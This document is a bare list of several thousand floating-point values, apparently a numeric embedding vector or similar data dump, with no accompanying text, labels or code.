0.024659056216478348, 0.0012878688285127282, -0.003066438715904951, 0.020832650363445282, -0.02842877432703972, 0.0005921184783801436, -0.04654042422771454, -0.017587292939424515, 0.004690889269113541, -0.026147102937102318, -0.014696230180561543, -0.011606762185692787, -0.032255180180072784, -0.003702401416376233, 0.02854214794933796, -0.015900839120149612, 0.028683867305517197, 0.009757333435118198, -0.009459723718464375, -0.016566917300224304, 0.01345619186758995, -0.048184361308813095, -0.035939864814281464, 0.024092180654406548, -0.02485746145248413, -0.013831745833158493, -0.04744742438197136, 0.0011718366295099258, -0.025140900164842606, 0.0027635148726403713, 0.002581052016466856, -0.019727244973182678, -0.005821096245199442, -0.004917639307677746, 0.03506121039390564, -0.008751130662858486, -0.004634201992303133, 0.0028272883500903845, 0.051160454750061035, -0.007004447281360626, 0.004134643357247114, 0.0070823924615979195, -0.037527114152908325, 0.03619495779275894, 0.01798410527408123, 0.010671419091522694, -0.004942439962178469, -0.008255114778876305, 0.011387098580598831, 0.009247145615518093, 0.011741395108401775, -0.0053923968225717545, -0.03503286466002464, 0.013151496648788452, -0.005796295125037432, -0.010267520323395729, -0.010735192336142063, 0.020903509110212326, 0.03999302163720131, -0.011309153400361538, -0.0002872018376365304, -0.014526167884469032, -0.0020850365981459618, -0.007553607225418091, -0.01751643233001232, -0.023808743804693222, -0.029052335768938065, -0.02348279021680355, -0.0034738800022751093, -0.00006820212729508057, 0.002961921039968729, 0.014079754240810871, -0.020095713436603546, -0.04481145739555359, -0.0018210854614153504, -0.010969027876853943, -0.039454489946365356, -0.018423432484269142, -0.021682962775230408, 0.029392460361123085, 0.014795433729887009, 0.007100107613950968, 0.004460596479475498, -0.004914096090942621, 0.03630833327770233, 0.001342784846201539, -0.000037311878259060904, 0.034777771681547165, 0.007142622955143452, -0.04495317488908768, -0.022830884903669357, -0.009594356641173363, -0.04410286247730255, -0.027649320662021637, 0.007404802832752466, -0.012499590404331684, 0.011606762185692787, -0.013796316459774971, 0.017729010432958603, -0.023341070860624313, 0.017799871042370796, 0.013300301507115364, -0.01819668337702751, -0.0009743161499500275, 0.008602325804531574, -0.019996510818600655, 0.007355201058089733, -0.03163161501288414, -0.03194339573383331, 0.008644841611385345, 0.009431379847228527, 0.010161231271922588, 0.023440275341272354, -0.009884879924356937, 0.00876530259847641, 0.028159508481621742, 0.006083275657147169, -0.01602838560938835, 0.00923297367990017, -0.006012416444718838, -0.037980616092681885, 0.017006244510412216, -0.012407473288476467, 0.016779495403170586, -0.012435817159712315, 0.029009820893406868, 0.021498728543519974, -0.030554553493857384, 0.01472457405179739, -0.0028822042513638735, -0.011550075374543667, -0.006285225041210651, -0.00446768244728446, 0.0177431832998991, 0.03792392835021019, -0.002683798084035516, 0.02165461890399456, -0.013016863726079464, -0.023553648963570595, -0.01685035414993763, 0.004386194050312042, 0.027465086430311203, -0.006678494159132242, -0.0114508718252182, -0.008255114778876305, 0.035231269896030426, 0.022944258525967598, -0.003730745054781437, -0.000758195121306926, -0.03378574177622795, 0.009913223795592785, 0.029590867459774017, -0.030752960592508316, -0.009289661422371864, 0.020818479359149933, -0.01819668337702751, 0.003217014716938138, 0.023525306954979897, 0.006490717176347971, -0.039142709225416183, 0.008850333280861378, 0.004708603955805302, 0.0014375591417774558, 0.012910574674606323, 0.014937152154743671, -0.022405728697776794, 0.011302066966891289, 0.018947791308164597, 0.020889338105916977, 0.000013037014468864072, 0.006324197631329298, 0.009757333435118198, -0.006465916056185961, -0.005704178009182215, -0.025835320353507996, 0.00022165692644193769, -0.06915873289108276, 0.006653693504631519, 0.029647555202245712, 0.057679515331983566, 0.026657288894057274, -0.0049743265844881535, 0.002077950630337, -0.01982644759118557, 0.005852982867509127, -0.005566002335399389, -0.008949536830186844, -0.009714817628264427, 0.007702412083745003, -0.0005155018297955394, -0.002118694828823209, 0.024361446499824524, -0.01787072978913784, 0.006859185639768839, -0.008014192804694176, -0.01369711384177208, -0.02910902351140976, 0.008049623109400272, 0.024035492911934853, -0.014511995948851109, -0.006944216787815094, 0.026288820430636406, 0.002832602709531784, -0.01547568291425705, -0.008170084096491337, 0.02475825883448124, 0.01506469864398241, 0.005636861547827721, 0.024318931624293327, -0.0074260602705180645, 0.012889317236840725, -0.004804264288395643, 0.00854563806205988, 0.02258996292948723, -0.016325995326042175, 0.004783006384968758, 0.002825516741722822, 0.01809747889637947, -0.024233900010585785, -0.010295864194631577, 0.00010468362597748637, 0.011273723095655441, 0.010883997194468975, 0.001849429216235876, -0.007631552405655384, -0.011989402584731579, 0.00441453792154789, -0.009218801744282246, -0.009927395731210709, -0.01924540102481842, -0.012917660176753998, -0.027663491666316986, 0.032595302909612656, -0.014639542438089848, -0.00906291138380766, 0.020124057307839394, 0.07579116523265839, -0.010522614233195782, 0.007815786637365818, 0.004410994704812765, 0.00040212683961726725, 0.01104697398841381, 0.017814042046666145, 0.00824802927672863, 0.00264836847782135, -0.015744948759675026, 0.002363159554079175, 0.040389832109212875, 0.0013587281573563814, -0.0014552740612998605, 0.02532513439655304, 0.013994722627103329, -0.0017218823777511716, -0.008800731971859932, 0.013767972588539124, 0.010969027876853943, 0.0006116048316471279, 0.01663777604699135, 0.008581068366765976, -0.029052335768938065, -0.002940663369372487, 0.009998255409300327, -0.00633128359913826, -0.051047079265117645, 0.008155912160873413, 0.0077165840193629265, -0.011273723095655441, 0.00707176374271512, 0.001475646044127643, -0.02393629029393196, 0.005821096245199442, 0.024106353521347046, 0.02713913284242153, 0.02293008752167225, 0.030667928978800774, -0.03245358541607857, -0.00968647375702858, 0.008722786791622639, 0.01369711384177208, 0.01042341161519289, -0.016014214605093002, 0.0006390628404915333, -0.02015240117907524, 0.013888433575630188, -0.04591686278581619, 0.013165668584406376, 0.0036917724646627903, -0.015022183768451214, -0.011741395108401775, 0.017388885840773582, -0.010359637439250946, 0.0004324635083321482, -0.019528837874531746, 0.001005317084491253, 0.017913244664669037, 0.010473012924194336, -0.00996991153806448, 0.010728106833994389, -0.01948632299900055, 0.0021204662043601274, -0.005236506462097168, -0.004510197788476944, -0.019642213359475136, -0.0005775037570856512, -0.03268033638596535, 0.008701528422534466, 0.0013489850098267198, 0.003441993147134781, -0.011380012147128582, 0.0015668774722144008, -0.014979667961597443, -0.0043543074280023575, 0.006285225041210651, 0.020322462543845177, -0.016892870888113976, -0.025155071169137955, 0.009027482010424137, -0.017587292939424515, 0.008113396354019642, 0.003861834993585944, 0.006678494159132242, 0.027323367074131966, -0.0343809612095356, -0.015985870733857155, -0.01617010496556759, -0.006689123343676329, -0.019571354612708092, 0.010635989718139172, 0.01743140071630478, 0.0037590889260172844, 0.0091692004352808, -0.0033746769186109304, 0.023284384980797768, 0.020719274878501892, -0.005870697554200888, -0.003631541971117258, 0.0037626316770911217, 0.003094782354310155, 0.003929151222109795, -0.011422527953982353, 0.00923297367990017, 0.013796316459774971, -0.001372014288790524, -0.00887159164994955, -0.004857408814132214, 0.006093904376029968, 0.016325995326042175, -0.033615678548812866, 0.01472457405179739, -0.01615593396127224, 0.00555537361651659, 0.000343003572197631, 0.009332177229225636, 0.00332153239287436, -0.012060262262821198, -0.03934111446142197, -0.014370277523994446, 0.017119619995355606, -0.01128080952912569, -0.026898210868239403, 0.02015240117907524, 0.033218864351511, 0.02015240117907524, -0.017133792862296104, -0.010969027876853943, -0.01313023827970028, 0.010352551937103271, 0.014497824013233185, 0.03310549259185791, 0.007815786637365818, 0.006770611274987459, 0.011436699889600277, 0.002703284379094839, -0.002988493302837014, 0.010558043606579304, -0.01099737174808979, -0.036365021020174026, 0.0005279022152535617, -0.001209037727676332, 0.006069103721529245, 0.015645746141672134, 0.010820223949849606, -0.002067321678623557, -0.0026961984112858772, 0.018182510510087013, -0.005495143122971058, 0.011961059644818306, -0.03426758572459221, 0.021045228466391563, 0.001001774100586772, 0.016325995326042175, -0.0024747629649937153, 0.004375565331429243, -0.024432305246591568, -0.0031780421268194914, 0.019628042355179787, -0.01328612957149744, 0.031915053725242615, 0.010444669052958488, -0.022717509418725967, 0.019543010741472244, 0.004251561127603054, -0.03525961562991142, -0.025495195761322975, -0.016184275969862938, -0.004173615947365761, 0.015730777755379677, -0.0029158624820411205, 0.00024933635722845793, -0.008694442920386791, 0.03985130041837692, 0.04688055068254471, 0.005378224886953831, -0.020350806415081024, -0.009920310229063034, -0.009636872448027134, -0.0024907062761485577, -0.01673698052763939, 0.020350806415081024, -0.0006758210947737098, -0.022136462852358818, -0.018423432484269142, 0.009176286868751049, 0.0016722808359190822, -0.015773292630910873, 0.005739607848227024, 0.01903282292187214, 0.02545268088579178, 0.0013604996493086219, -0.008106309920549393, 0.02854214794933796, -0.027578461915254593, 0.006522603798657656, -0.026090415194630623, 0.01845177635550499, -0.029732584953308105, -0.02419138327240944, -0.012400386855006218, 0.034324273467063904, -0.021796338260173798, 0.01414352748543024, -0.044159550219774246, -0.015546542592346668, -0.0007887532119639218, 0.019571354612708092, 0.004255104344338179, 0.0020318920724093914, 0.010104544460773468, 0.007730755489319563, 0.00765281030908227, 0.046001892536878586, -0.005686463322490454, -0.016481885686516762, -0.033247210085392, -0.0036705145612359047, -0.009551840834319592, 0.01777152717113495, -0.025962868705391884, 0.015546542592346668, 0.012577535584568977, 0.003790975548326969, 0.011507559567689896, 0.01571660488843918, -0.022660821676254272, -0.005721893161535263, 0.018508464097976685, 0.004318877588957548, -0.013477449305355549, 0.02131449431180954, 0.016354339197278023, -0.009920310229063034, -0.016325995326042175, -0.028372086584568024, -0.04824104905128479, 0.015390652231872082, 0.0038122334517538548, -0.01754477620124817, 0.0018618295434862375, -0.030327804386615753, -0.003169184783473611, 0.009643957950174809, -0.0002362716622883454, 0.004786549601703882, 0.005395940039306879, -0.0010159460362046957, -0.013222355395555496, 0.004744033794850111, 0.03574145957827568, -0.0034331358037889004, -0.023326899856328964, 0.002643053885549307, 0.004403908737003803, -0.003050495171919465, -0.008524380624294281, -0.01444113627076149, -0.038434114307165146, 0.02587783709168434, 0.0014517310773953795, -0.024545680731534958, 0.009133771061897278, -0.015248933807015419, -0.014653714373707771, -0.016212619841098785, -0.009920310229063034, -0.004970783833414316, 0.0021771537140011787, 0.0030558097641915083, 0.0171763077378273, -0.006869814358651638, -0.011826426722109318, -0.013810488395392895, -0.00667140819132328, 0.002899919170886278, 0.014696230180561543, -0.02922239899635315, 0.022037260234355927, -0.009821106679737568, 0.006051389034837484, -0.004793635569512844, -0.023341070860624313, -0.0012108092196285725, 0.0063702561892569065, -0.006292311009019613, 0.0091692004352808, 0.004938897211104631, -0.008630669675767422, 0.031915053725242615, -0.012364957481622696, 0.009736075066030025, -0.015603230334818363, 0.002063778694719076, 0.014696230180561543, 0.01003368478268385, 0.0151780741289258, 0.027677664533257484, -0.01741722971200943, -0.004797178320586681, -0.002573966048657894, 0.027521774172782898, -0.018763557076454163, -0.020265774801373482, -0.010387981310486794, -0.007532349321991205, -0.012414558790624142, 0.02531096152961254, 0.009417207911610603, -0.010848567821085453, 0.022533275187015533, -0.033048804849386215, 0.008907021023333073, 0.006852099671959877, 0.0018476577242836356, -0.022037260234355927, 0.024814946576952934, -0.028017789125442505, -0.0076598962768912315, 0.0030079795978963375, 0.0005310022970661521, 0.005303822923451662, 0.00035894691245630383, -0.022986775264143944, 0.003369362326338887, -0.02474408783018589, -0.008446435444056988, -0.01673698052763939, 0.0017546548042446375, 0.019160369411110878, 0.007433146238327026, 0.007046963088214397, -0.008446435444056988, -0.004570428282022476, 0.01730385422706604, 0.01083439588546753, -0.026671461760997772, -0.009580184705555439, -0.0037697176449000835, -0.017388885840773582, 0.036846864968538284, -0.012853886932134628, -0.015333964489400387, 0.020464181900024414, 0.011337497271597385, 0.009459723718464375, -0.013711285777390003, -0.03540133312344551, -0.0029849503189325333, -0.015135558322072029, 0.02189554087817669, -0.00741897476837039, 0.021697135642170906, -0.012294097803533077, 0.013009777292609215, -0.003886635648086667, 0.008694442920386791, 0.010947770439088345, -0.015603230334818363, -0.0011381783988326788, -0.018947791308164597, 0.005236506462097168, -0.0036882294807583094, -0.009289661422371864, -0.0010921198409050703, -0.010451754555106163, -0.0010912340367212892, 0.00270682736299932, -0.024318931624293327, 0.003410106524825096, 0.014526167884469032, 0.021597931161522865, -0.019330432638525963, 0.02786189876496792, -0.0010363180190324783, 0.05637570470571518, -0.013633339665830135, -0.011656364426016808, 0.02430475875735283, -0.013151496648788452, -0.008219685405492783, -0.012563363648951054, -0.03840577229857445, 0.017899073660373688, -0.006338369566947222, -0.01013997383415699, -0.0030044366139918566, -0.01670863665640354, -0.007645724341273308, 0.011054059490561485, 0.012974347919225693, 0.004017725586891174, 0.016651948913931847, -0.013328644447028637, -0.01911785453557968, -0.01753060519695282, -0.0072985137812793255, -0.018054964020848274, -0.013031035661697388, -0.019684728235006332, -0.01728968322277069, -0.01707710511982441, 0.017048761248588562, 0.03528795763850212, -0.00038020472857169807, 0.0002378217177465558, -0.02808864787220955, 0.022320697084069252, -0.0036226846277713776, 0.016524402424693108, -0.0033941632136702538, 0.0021789250895380974, -0.013045207597315311, -0.032822053879499435, -0.022958431392908096, 0.026628945022821426, 0.05765117332339287, 0.006373798940330744, -0.023440275341272354, -0.022533275187015533, 0.012294097803533077, -0.014653714373707771, -0.021512899547815323, -0.02084682323038578, -0.0031744991429150105, 0.010983199812471867, 0.003279016586020589, -0.02348279021680355, 0.006511974614113569, -0.007681154180318117, 0.016992073506116867, 0.011195777915418148, -0.0031426125206053257, 0.012690911069512367, 0.01741722971200943, -0.0010460612829774618, -0.005948642734438181, -0.005108959507197142, 0.003539424855262041, 0.008049623109400272, 0.003886635648086667, -0.002937120385468006, 0.01730385422706604, -0.017969932407140732, 0.00675998255610466, -0.024616539478302002, 0.0002511078491806984, -0.023638680577278137, -0.02464488334953785, 0.03251027315855026, -0.01282554306089878, 0.011854770593345165, 0.026898210868239403, 0.007511091884225607, -0.0019521752838045359, -0.01117452047765255, 0.0007130222511477768, 0.009736075066030025, 0.006791869178414345, 0.02120111882686615, -0.03197174146771431, 0.00818425603210926, 0.0017457973444834352, 0.018409261479973793, -0.004000010434538126, 0.003932694438844919, 0.006345455534756184, 0.0016058501787483692, -0.001006202888675034, 0.011698879301548004, -0.015121386386454105, 0.01845177635550499, 0.007773271296173334, 0.004056698177009821, -0.004659002646803856, -0.004630658775568008, 0.005385310854762793, 0.009821106679737568, -0.0049743265844881535, 0.017218822613358498, 0.023752056062221527, 0.023893775418400764, -0.019783932715654373, -0.001190437120385468, 0.0019468608079478145, -0.006582834292203188, 0.005084158852696419, -0.012535019777715206, -0.001069090561941266, -0.011961059644818306, -0.006161220837384462, -0.008219685405492783, 0.011599676683545113, 0.0008511979831382632, 0.01094068493694067, 0.003964581061154604, 0.014363191090524197, 0.0117343096062541, -0.005027471110224724, -0.021045228466391563, -0.0018113423138856888, -0.010515528731048107, 0.011805168353021145, 0.0126129649579525, 0.0017218823777511716, -0.012258668430149555, 0.009027482010424137, -0.0036776005290448666, -0.015234761871397495, -0.012428730726242065, 0.009530583396553993, -0.02487163431942463, -0.009743161499500275, -0.011904371902346611, 0.012563363648951054, 0.009976997040212154, -0.011287895031273365, -0.014469480141997337, -0.017700666561722755, 0.0008007106953300536, 0.0007976106135174632, 0.0034915946889668703, -0.028116991743445396, -0.0012170093832537532, 0.011436699889600277, -0.00017604121239855886, -0.00463774474337697, -0.0009069997468031943, -0.015107214450836182, -0.0011222350876778364, 0.006015959195792675, -0.005087701603770256, 0.004736947827041149, 0.000028703574571409263, 0.0018760014791041613, 0.013633339665830135, -0.015404824167490005, 0.0035748544614762068, 0.000002069037918772665, 0.006745810620486736, -0.00962270051240921, 0.005186904687434435, -0.01082730945199728, 0.004460596479475498, -0.01169179379940033, 0.00043622791417874396, -0.03358733281493187, -0.006820213049650192, 0.009877794422209263, 0.00893536489456892, 0.012116950005292892, -0.008878677152097225, 0.00013828645751345903, 0.003978752996772528, -0.005828182213008404, -0.013264871202409267, 0.0007998249493539333, -0.007922075688838959, 0.009764418937265873, 0.013675855472683907, 0.031348180025815964, 0.019968166947364807, -0.007560693193227053, -0.00031244548154063523, 0.019344603642821312, -0.006086818873882294, -0.024673227220773697, 0.014469480141997337, -0.016226792708039284, 0.00633128359913826, 0.022249838337302208, -0.020322462543845177, -0.007574865128844976, 0.023511134088039398, -0.007546521257609129, 0.013328644447028637, -0.0037555459421128035, 0.014795433729887009, 0.010841481387615204, 0.005548287648707628, 0.018040791153907776, -0.0103100361302495, -0.016779495403170586, -0.026543915271759033, 0.00048715807497501373, 0.0009690016740933061, 0.006497803144156933, -0.015617402270436287, 0.002866260940209031, 0.020109884440898895, -0.0020549213513731956, -0.006632435601204634, 0.029760928824543953, -0.012577535584568977, -0.005236506462097168, -0.013059379532933235, 0.0006829070625826716, 0.006689123343676329, 0.018536807969212532, 0.03610992804169655, 0.02142786979675293, 0.004747577011585236, 0.006132877431809902, -0.0003713472979143262, 0.01685035414993763, 0.003631541971117258, -0.0023312726989388466, 0.01582998037338257, 0.003730745054781437, 0.012924746610224247, -0.012336613610386848, 0.00824802927672863, -0.027578461915254593, -0.0006651922012679279, -0.002141724107787013, -0.019089510664343834, -0.002228526631370187, -0.007773271296173334, -0.011252465657889843, 0.010302950628101826, -0.010912341065704823, 0.007355201058089733, 0.0040779560804367065, -0.004659002646803856, 0.01351996511220932, 0.0032772452104836702, -0.008496036753058434, -0.011989402584731579, 0.01995399408042431, 0.027578461915254593, -0.02590618096292019, 0.006951302755624056, -0.0018015991663560271, 0.004393280018121004, 0.014157699421048164, -0.004251561127603054, -0.004910553339868784, -0.014200215227901936, -0.012995606288313866, -0.005721893161535263, -0.009643957950174809, 0.004177159164100885, -0.01072102040052414, -0.02475825883448124, -0.014327761717140675, -0.005364053416997194, 0.018139995634555817, 0.023638680577278137, 0.03185836598277092, 0.0009282575338147581, -0.0002621796156745404, -0.010586387477815151, 0.003702401416376233, -0.026728149503469467, -0.01821085438132286, 0.012591707520186901, -0.007766185328364372, 0.010522614233195782, 0.017573120072484016, -0.0002444647834636271, 0.017842385917901993, -0.013094808906316757, -0.011571332812309265, 0.0023791028652340174, -0.009488067589700222, -0.019443808123469353, 0.02417721226811409, -0.004318877588957548, 0.017020417377352715, 0.013073551468551159, -0.005899041425436735, -0.010579301975667477, -0.003883092664182186, -0.016581088304519653, 0.0024907062761485577, 0.00871570035815239, 0.01134458277374506, -0.008488951250910759, 0.0038760066963732243, -0.0078087011352181435, 0.011812254786491394, 0.0044641392305493355, 0.004503112286329269, -0.0025757376570254564, -0.014108098112046719, 0.018395088613033295, 0.017232995480298996, -0.007730755489319563, -0.011868942528963089, -0.007167423609644175, 0.014001809060573578, 0.020563384518027306, 0.0003722330438904464, -0.009991168975830078, -0.034664396196603775, -0.003914979286491871, 0.016198448836803436, -0.0049743265844881535, 0.013647511601448059, -0.0022728138137608767, -0.002928262809291482, -0.00145350256934762, 0.0035482821986079216, -0.004393280018121004, -0.012669652700424194, 0.017388885840773582, -0.002170067746192217, 0.01740305684506893, -0.021498728543519974, -0.014965496025979519, -0.001790084526874125, 0.018636010587215424, 0.00807088054716587, -0.014221472665667534, 0.0001545619743410498, 0.00923297367990017, -0.00048450083704665303, 0.026614774018526077, 0.006678494159132242, -0.0229159165173769, 0.013406590558588505, -0.012024832889437675, -0.006224994547665119, 0.006193107459694147, 0.009629786014556885, 0.02763514779508114, -0.007780357263982296, -0.011025715619325638, 0.007068220525979996, 0.015617402270436287, 0.015248933807015419, 0.034551020711660385, -0.01659526117146015, -0.00002405343002465088, 0.008212598972022533, 0.0012595250736922026, -0.02910902351140976, 0.0000840347638586536, -0.002044292399659753, 0.0332755520939827, -0.018168339505791664, -0.008021279238164425, 0.0006014187820255756, -0.022632477805018425, 0.0015385337173938751, -0.007560693193227053, 0.014568683691322803, 0.01741722971200943, 0.008559809997677803, -0.012393301352858543, 0.018947791308164597, 0.002768829232081771, -0.002196640009060502, 0.01993982307612896, -0.013116066344082355, -0.002736942609772086, 0.016226792708039284, 0.01798410527408123, -0.004712147172540426, 0.01706293225288391, 0.029930992051959038, 0.010189575143158436, -0.011663449928164482, 0.023085977882146835, 0.025367649272084236, -0.009240060113370419, 0.013321558944880962, -0.00022398198780138046, -0.01937294751405716, -0.008311802521348, 0.012421645224094391, 0.03012939728796482, 0.011571332812309265, 0.022306526079773903, -0.00906291138380766, -0.0023436732590198517, -0.018508464097976685, -0.0034561650827527046, -0.018054964020848274, -0.002488934900611639, -0.02223566547036171, -0.005289650987833738, 0.01225158292800188, 0.02268916554749012, -0.007914990186691284, -0.004134643357247114, 0.004598772153258324, 0.008170084096491337, 0.01914619840681553, 0.001911431085318327, -0.014511995948851109, 0.03072461672127247, 0.017346370965242386, -0.014419878832995892, -0.00004567106952890754, 0.017558949068188667, -0.0177431832998991, -0.002262184862047434, -0.007284341845661402, -0.012839714996516705, -0.03446599096059799, -0.018267542123794556, 0.008694442920386791, 0.0062108226120471954, 0.02338358759880066, 0.014625371433794498, 0.01007620058953762, 0.004488940350711346, -0.013682941906154156, -0.009509325958788395, -0.00727725587785244, -0.025112556293606758, -0.0020921225659549236, 0.0038334911223500967, 0.010876910760998726, -0.01891944743692875, -0.0037520029582083225, 0.009523496963083744, -0.015263104811310768, -0.014476566575467587, -0.03381408378481865, 0.021838853135704994, 0.01764397881925106, 0.011528817005455494, -0.01582998037338257, 0.002747571561485529, -0.0091692004352808, -0.0006133763235993683, -0.004407451953738928, -0.018168339505791664, -0.006097447592765093, -0.004460596479475498, 0.0006656350451521575, -0.0343526154756546, -0.02898147702217102, -0.024432305246591568, -0.017686495557427406, 0.0001036318062688224, -0.0025597941130399704, -0.012428730726242065, -0.014086839742958546, 0.004744033794850111, 0.0047723776660859585, -0.02692655473947525, -0.025849493220448494, -0.03483445942401886, -0.02190971188247204, -0.002972549991682172, -0.024262243881821632, 0.02828705497086048, -0.0309513658285141, 0.004736947827041149, 0.020435838028788567, -0.009679388254880905, 0.021016884595155716, 0.00453145569190383, -0.0085952403023839, -0.004581057466566563, 0.006058475002646446, 0.007433146238327026, 0.001989376498386264, -0.007185138761997223, -0.0029902649112045765, -0.0013923863880336285, -0.008701528422534466, 0.012946004047989845, 0.007829958572983742, -0.003946865908801556, -0.0014101011911407113, 0.014412793330848217, -0.0006244480609893799, -0.0003049166698474437, 0.022533275187015533, 0.0007639524410478771, -0.0025491653941571712, -0.02278836816549301, 0.014108098112046719, -0.024262243881821632, 0.003316217800602317, 0.015433168038725853, -0.007829958572983742, -0.021597931161522865, 0.017941588535904884, -0.0017369400011375546, -0.010097458027303219, 0.012690911069512367, -0.009863622486591339, 0.008864505216479301, -0.005682920105755329, -0.01625513657927513, 0.005828182213008404, -0.016751151531934738, -0.0023082434199750423, 0.026487227529287338, -0.010196661576628685, 0.009934481233358383, 0.0016111646546050906, -0.008396833203732967, -0.002995579270645976, -0.019160369411110878, 0.006550947204232216, 0.003964581061154604, -0.007511091884225607, -0.004878666717559099, 0.01530562061816454, -0.002159438794478774, -0.018239198252558708, 0.017332198098301888, 0.011054059490561485, -0.0017263110494241118, 0.019783932715654373, 0.02084682323038578, 0.005395940039306879, 0.007780357263982296, 0.000030004508516867645, -0.01186185609549284, -0.005704178009182215, 0.026558086276054382, 0.006767068523913622, 0.027564289048314095, 0.005548287648707628, -0.01168470736593008, 0.018820244818925858, -0.013194012455642223, 0.00472631910815835, 0.01483794953674078, 0.00681312708184123, -0.007181595545262098, -0.00968647375702858, 0.0010451754787936807, -0.005732521880418062, -0.002359616570174694, 0.013704199343919754, -0.025849493220448494, 0.010189575143158436, 0.003413649508729577, -0.013881348073482513, -0.012931832112371922, -0.006249795202165842, 0.014136441051959991, 0.00003772706986637786, -0.0032931885216385126, -0.018621839582920074, -0.002774143824353814, -0.02382291480898857, 0.0120390048250556, -0.007518177852034569, 0.026543915271759033, 0.0002683798084035516, -0.03012939728796482, -0.0032559873070567846, -0.03483445942401886, 0.0014437594218179584, -0.012471246533095837, 0.015036355704069138, -0.015135558322072029, 0.021144431084394455, 0.008864505216479301, -0.02784772589802742, -0.013704199343919754, 0.008970794267952442, 0.0015987642109394073, 0.016453541815280914, 0.020591728389263153, -0.0061860219575464725, -0.02359616570174694, 0.008970794267952442, -0.004216131754219532, 0.01283262949436903, 0.041892051696777344, -0.008864505216479301, 0.005548287648707628, -0.008673185482621193, 0.01651022955775261, -0.000806025171186775, 0.007844130508601665, 0.009211716242134571, -0.0020921225659549236, 0.004825522191822529, -0.008573981933295727, 0.014164784923195839, 0.0029636926483362913, 0.0005022156983613968, -0.01812582276761532, -0.003461479442194104, -0.00854563806205988, 0.004733405075967312, 0.02451733686029911, -0.00598407257348299, -0.012917660176753998, -0.014625371433794498, 0.02176799438893795, -0.02152707241475582, 0.013484535738825798, 0.0013374703703448176, 0.008843247778713703, -0.005576631519943476, -0.022264009341597557, -0.01777152717113495, 0.0031195832416415215, -0.009126684628427029, 0.0067564393393695354, 0.0032595302909612656, -0.022490760311484337, -0.007943334057927132, 0.008333059959113598, -0.00290700513869524, -0.0011443785624578595, 0.007475662045180798, -0.007666982244700193, 0.0021806966979056597, -0.025183415040373802, 0.0006071761017665267, 0.0105934739112854, 0.001519933226518333, -0.0037520029582083225, 0.010161231271922588, 0.012322441674768925, -0.003183356486260891, -0.0166094321757555, 0.003383534261956811, 0.014200215227901936, 0.0007953962776809931, -0.007504005916416645, -0.031915053725242615, -0.003516395576298237, -0.03262364864349365, 0.010154145769774914, 0.009218801744282246, 0.012216152623295784, -0.015744948759675026, -0.001527019077911973, -0.0014074438950046897, -0.002754657529294491, 0.021257806569337845, -0.00010496041795704514, -0.00406732689589262, 0.004609400872141123, -0.0031744991429150105, -0.008496036753058434, -0.01231535617262125, -0.016325995326042175, 0.02315683662891388, 0.00865192711353302, -0.005445541348308325, -0.022519102320075035, -0.013293215073645115, 0.015674090012907982, 0.012648395262658596, 0.0015093042748048902, 0.003564225509762764, -0.013881348073482513, -0.008120481856167316, 0.013094808906316757, 0.026543915271759033, -0.009877794422209263, -0.0015624488005414605, 0.022207321599125862, 0.02049252577126026, -0.01541899610310793, -0.00030093081295490265, 0.004283448215574026, -0.033984147012233734, 0.002228526631370187, 0.000012351948498690035, -0.013902605511248112, 0.001005317084491253, -0.014809605665504932, -0.005863611586391926, 0.0030221515335142612, 0.010678504593670368, -0.006685580126941204, 0.01592918299138546, 0.012357871979475021, -0.028641352429986, -0.02268916554749012, -0.008963708765804768, 0.02267499454319477, -0.009112512692809105, -0.013449105434119701, -0.012761769816279411, 0.044386301189661026, -0.007936247624456882, 0.021116087213158607, 0.0009185143862850964, -0.022717509418725967, 0.016581088304519653, 0.0010248033795505762, 0.01911785453557968, -0.010267520323395729, 0.006961931474506855, -0.012223239056766033, -0.0006882214802317321, -0.014256902039051056, -0.014965496025979519, 0.017700666561722755, -0.004106299486011267, 0.013279043138027191, 0.0022940717171877623, -0.013307387009263039, 0.0015500483568757772, 0.007128451019525528, 0.028357913717627525, 0.008538552559912205, 0.002754657529294491, -0.029420804232358932, 0.013824660331010818, -0.01100445818156004, 0.0023472162429243326, 0.001098320004530251, 0.006469459272921085, -0.009721904061734676, 0.005346338264644146, -0.01947215013206005, 0.010664332658052444, 0.024446478113532066, -0.008085052482783794, 0.0032117003574967384, -0.004102756734937429, 0.0030930109787732363, 0.002552708378061652, 0.008113396354019642, -0.005091244820505381, -0.0017697124276310205, 0.0023613879457116127, -0.0033321611117571592, 0.015319792553782463, 0.012931832112371922, -0.00906291138380766, 0.014051410369575024, -0.006437572650611401, -0.004977869801223278, 0.02438979037106037, 0.000739594514016062, -0.014639542438089848, -0.0005181590095162392, -0.0058600688353180885, 0.000493801140692085, 0.029250742867588997, -0.016822010278701782, 0.01037380937486887, 0.013094808906316757, -0.004478311166167259, 0.010182489641010761, 0.014710402116179466, -0.017587292939424515, -0.0066466075368225574, 0.029080679640173912, -0.0017032817704603076, -0.020662588998675346, 0.01500801183283329, 0.0027582005131989717, -0.015036355704069138, -0.00005109623816679232, 0.011202864348888397, -0.004591686185449362, 0.026969071477651596, 0.014469480141997337, -0.005045186262577772, -0.005222334526479244, -0.01615593396127224, -0.009707732126116753, 0.009069997817277908, 0.01636851206421852, 0.021357009187340736, 0.00550222909078002, 0.007178052794188261, -0.022419899702072144, -0.00000938332868827274, 0.00045748570119030774, -0.0012329528108239174, 0.014979667961597443, 0.022731680423021317, -0.007156794890761375, 0.00013740072608925402, -0.007089478429406881, -0.013314472511410713, 0.01089108269661665, 0.010097458027303219, -0.013746715150773525, -0.024333102628588676, -0.004899924620985985, -0.014476566575467587, -0.003339247079566121, -0.024248071014881134, 0.004035440273582935, 0.01099737174808979, 0.006958388723433018, -0.016992073506116867, -0.016751151531934738, -0.002935348777100444, -0.017261339351534843, -0.01568826101720333, -0.004999127704650164, -0.021116087213158607, -0.012853886932134628, 0.002682026708498597, 0.030327804386615753, -0.022405728697776794, -0.010572215542197227, 0.02027994766831398, 0.0017759125912562013, 0.015560714527964592, -0.00927548948675394, 0.01444113627076149, 0.006834384985268116, -0.0059876153245568275, 0.002676712116226554, 0.0027351712342351675, -0.022745853289961815, -0.006395056843757629, 0.0022798997815698385, -0.0022533275187015533, -0.0004320206353440881, 0.0054845139384269714, -0.0016545659163966775, 0.012187808752059937, 0.01615593396127224, -0.01808330789208412, -0.014795433729887009, -0.033247210085392, -0.009325090795755386, -0.01615593396127224, -0.00996282510459423, -0.006458830088376999, -0.013194012455642223, 0.005778580438345671, -0.013080636970698833, 0.03103639744222164, -0.0036669715773314238, 0.005080615635961294, 0.01048718485981226, 0.000909656984731555, -0.007404802832752466, -0.01547568291425705, 0.0211869478225708, 0.022178977727890015, -0.006795412395149469, -0.008063795045018196, -0.009502239525318146, 0.003971667028963566, 